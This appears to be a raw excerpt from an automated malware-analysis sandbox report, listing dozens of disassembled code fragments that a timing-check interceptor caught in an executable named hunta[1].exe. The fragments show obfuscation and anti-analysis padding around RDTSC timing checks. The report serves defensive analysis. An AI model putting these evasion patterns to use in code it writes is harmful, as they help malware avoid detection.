Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185DB3 second address: 1185E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF2E5514DE6h 0x00000009 jmp 00007FF2E5514DF0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 call 00007FF2E5514DECh 0x00000017 mov ebx, 48FACC06h 0x0000001c pop ebx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push edi 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FF2E5514DE8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D00B9h] 0x0000004d mov ebx, dword ptr [ebp+122D2A05h] 0x00000053 push FFFFFFFFh 0x00000055 pushad 0x00000056 xor bx, 9051h 0x0000005b mov dl, ADh 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FF2E5514DF0h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1187A68 second address: 1187AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007FF2E55A2C2Eh 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FF2E55A2C28h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007FF2E55A2C35h 0x00000031 push 00000000h 0x00000033 or dword ptr [ebp+122D2387h], eax 0x00000039 push 00000000h 0x0000003b mov ebx, eax 0x0000003d xchg eax, esi 0x0000003e jng 00007FF2E55A2C2Ch 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push edi 0x00000048 pop edi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop ecx 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185E43 second address: 1185E49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185E49 second address: 1185E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1185E4F second address: 1185E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1188A09 second address: 1188A2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C32h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FF2E55A2C28h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1188A2D second address: 1188A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1188A33 second address: 1188A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FF2E55A2C28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 mov bx, si 0x0000002c sub dword ptr [ebp+122D2173h], edx 0x00000032 popad 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D2931h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF2E55A2C2Eh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1187BF6 second address: 1187BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1187BFB second address: 1187C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FF2E55A2C26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FF2E55A2C28h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2A31h] 0x0000002f or ebx, 2D33E831h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov di, FF36h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov bl, FBh 0x00000049 jmp 00007FF2E55A2C33h 0x0000004e mov eax, dword ptr [ebp+122D09EDh] 0x00000054 movzx ebx, di 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, dword ptr [ebp+122D29E9h] 0x0000005f jmp 00007FF2E55A2C2Dh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FF2E55A2C36h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1189B93 second address: 1189B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1189B97 second address: 1189C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, CDE4h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FF2E55A2C28h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D270Eh] 0x0000002e mov ebx, dword ptr [ebp+122D2975h] 0x00000034 or edi, dword ptr [ebp+122D20DDh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FF2E55A2C28h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jno 00007FF2E55A2C2Ch 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF2E55A2C30h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118AC0C second address: 118AC78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF2E5514DE8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FF2E5514DE8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 jg 00007FF2E5514DECh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d pop edx 0x0000004e pushad 0x0000004f je 00007FF2E5514DE6h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118CCB1 second address: 118CD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF2E55A2C26h 0x00000009 jp 00007FF2E55A2C26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 je 00007FF2E55A2C3Dh 0x00000019 js 00007FF2E55A2C37h 0x0000001f jmp 00007FF2E55A2C31h 0x00000024 nop 0x00000025 mov edi, ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FF2E55A2C28h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov di, C1C1h 0x00000047 sbb bl, FFFFFFFCh 0x0000004a push 00000000h 0x0000004c mov ebx, 5DFAFA11h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118CD17 second address: 118CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118CD2C second address: 118CD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118DBBC second address: 118DC12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov ebx, 7CCC69DDh 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D2A85h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FF2E5514DE8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007FF2E5514DF7h 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118DC12 second address: 118DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FF2E55A2C34h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118DC38 second address: 118DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118AE22 second address: 118AE2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1190C9B second address: 1190C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118FEF1 second address: 118FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 118FEF5 second address: 118FEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198BE4 second address: 1198BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198BEA second address: 1198C1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF2E5514DF6h 0x00000012 pushad 0x00000013 js 00007FF2E5514DE6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198C1A second address: 1198C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1198D89 second address: 1198D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1137B09 second address: 1137B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 119E65D second address: 119E663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 119E663 second address: 119E667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A46F7 second address: 11A46FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A499C second address: 11A49A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A49A6 second address: 11A49AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A49AA second address: 11A49B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4B25 second address: 11A4B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF2E5514DF2h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4B3E second address: 11A4B43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4CBF second address: 11A4CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4CDB second address: 11A4CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4CDF second address: 11A4CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1130EED second address: 1130EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1130EF3 second address: 1130EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4E5C second address: 11A4E77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007FF2E55A2C26h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E55A2C2Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4E77 second address: 11A4E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4E97 second address: 11A4EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF2E55A2C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EA6 second address: 11A4EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EAA second address: 11A4EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EB0 second address: 11A4EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4EB6 second address: 11A4EBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A4FFE second address: 11A5003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A518E second address: 11A51AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push edx 0x00000008 jmp 00007FF2E55A2C36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A51AE second address: 11A51B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113CA95 second address: 113CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 113CAA0 second address: 113CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A985E second address: 11A986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A9E2C second address: 11A9E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A9E47 second address: 11A9E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jno 00007FF2E55A2C26h 0x00000010 jng 00007FF2E55A2C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A954D second address: 11A956B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11A956B second address: 11A9586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF2E55A2C36h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11AA3D4 second address: 11AA3DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11AA3DA second address: 11AA3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11AA3E0 second address: 11AA3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B41DA second address: 11B41E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2B83 second address: 11B2BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a jmp 00007FF2E5514DECh 0x0000000f jns 00007FF2E5514DE6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2CF6 second address: 11B2D02 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF2E55A2C26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2D02 second address: 11B2D12 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF2E5514DE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2D12 second address: 11B2D16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2E65 second address: 11B2E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2E6B second address: 11B2E78 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E55A2C28h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2FE7 second address: 11B2FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B38DF second address: 11B3918 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FF2E55A2C2Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 jmp 00007FF2E55A2C38h 0x00000019 jnl 00007FF2E55A2C26h 0x0000001f pop edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B3918 second address: 11B3928 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DF2h 0x00000008 jbe 00007FF2E5514DE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 115C543 second address: 115C55C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edi 0x0000000d pushad 0x0000000e pushad 0x0000000f jg 00007FF2E55A2C26h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 115C55C second address: 115C579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push esi 0x0000000c jbe 00007FF2E5514DE6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 ja 00007FF2E5514DE6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B404A second address: 11B4059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jnp 00007FF2E55A2C26h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B4059 second address: 11B405E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B405E second address: 11B4066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11B2832 second address: 11B2836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
